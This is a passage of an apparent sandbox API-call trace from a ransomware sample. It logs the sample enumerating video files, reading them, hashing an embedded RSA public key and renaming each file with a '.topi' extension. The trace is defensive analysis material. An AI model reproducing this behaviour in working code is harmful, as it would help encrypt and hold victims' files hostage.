lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.898] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\Xs0q0e50s.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\xs0q0e50s.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\Xs0q0e50s.mkv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\xs0q0e50s.mkv.topi")) returned 1 [0096.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.899] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.900] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe131e480, ftCreationTime.dwHighDateTime=0x1d5c324, ftLastAccessTime.dwLowDateTime=0xfcf37010, ftLastAccessTime.dwHighDateTime=0x1d5bf57, ftLastWriteTime.dwLowDateTime=0xfcf37010, ftLastWriteTime.dwHighDateTime=0x1d5bf57, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z4k8sZRNNGS3Ve7W-", cAlternateFileName="Z4K8SZ~1")) returned 1 [0096.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4258 [0096.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd6) returned 0x766b58 [0096.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0096.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317eb10 [0096.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0096.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0096.900] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b66a80, ftCreationTime.dwHighDateTime=0x1d5b9ee, ftLastAccessTime.dwLowDateTime=0xbdb899e0, ftLastAccessTime.dwHighDateTime=0x1d5bb4f, ftLastWriteTime.dwLowDateTime=0xbdb899e0, ftLastWriteTime.dwHighDateTime=0x1d5bb4f, nFileSizeHigh=0x0, nFileSizeLow=0x1099f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZD5V8lqtUK4C7.flv", cAlternateFileName="ZD5V8L~1.FLV")) returned 1 [0096.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0096.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.900] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\ZD5V8lqtUK4C7.flv") returned=".flv" [0096.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\ZD5V8lqtUK4C7.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\zd5v8lqtuk4c7.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.901] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=67999) returned 1 [0096.901] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.904] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x10979, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.904] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.904] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.905] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x1099f, lpOverlapped=0x0) returned 1 [0096.905] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.905] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.905] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.905] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.906] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.906] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.906] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.906] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.906] GetLastError () returned 0x0 [0096.906] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.906] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.906] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.906] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.907] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x109a0) returned 0x9a06a00 [0096.907] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02ea0 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b80 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02ee8 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b98 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bc8 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4be0 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.907] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bc8 | out: hHeap=0x680000) returned 1 [0096.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4be0 | out: hHeap=0x680000) returned 1 [0096.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4be0 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4bc8 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4be0 | out: hHeap=0x680000) returned 1 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bc8 | out: hHeap=0x680000) returned 1 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.908] GetCurrentThreadId () returned 0x8c4 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8a90 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.909] GetCurrentThreadId () returned 0x8c4 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bc8 [0096.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4be0 [0096.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.910] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\ZD5V8lqtUK4C7.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\zd5v8lqtuk4c7.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\ZD5V8lqtUK4C7.flv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\zd5v8lqtuk4c7.flv.topi")) returned 1 [0096.911] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.911] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.911] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.912] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.912] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b66a80, ftCreationTime.dwHighDateTime=0x1d5b9ee, ftLastAccessTime.dwLowDateTime=0xbdb899e0, ftLastAccessTime.dwHighDateTime=0x1d5bb4f, ftLastWriteTime.dwLowDateTime=0xbdb899e0, ftLastWriteTime.dwHighDateTime=0x1d5bb4f, nFileSizeHigh=0x0, nFileSizeLow=0x1099f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZD5V8lqtUK4C7.flv", cAlternateFileName="ZD5V8L~1.FLV")) returned 0 [0096.912] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0096.912] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0096.912] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3da8 | out: hHeap=0x680000) returned 1 [0096.912] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.912] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.912] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\") returned="_tGjm1G\\" [0096.913] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0096.913] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.913] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.913] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.913] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.913] PathFindFileNameW (pszPath="") returned="" [0096.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\3sSi1-59PLiPMEl5xfK.mkv") returned=".mkv" [0096.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\3sSi1-59PLiPMEl5xfK.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\3ssi1-59plipmel5xfk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.913] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=91439) returned 1 [0096.913] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.916] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x16509, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.916] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.917] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.917] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.917] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.917] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x1652f, lpOverlapped=0x0) returned 1 [0096.917] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.917] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.918] 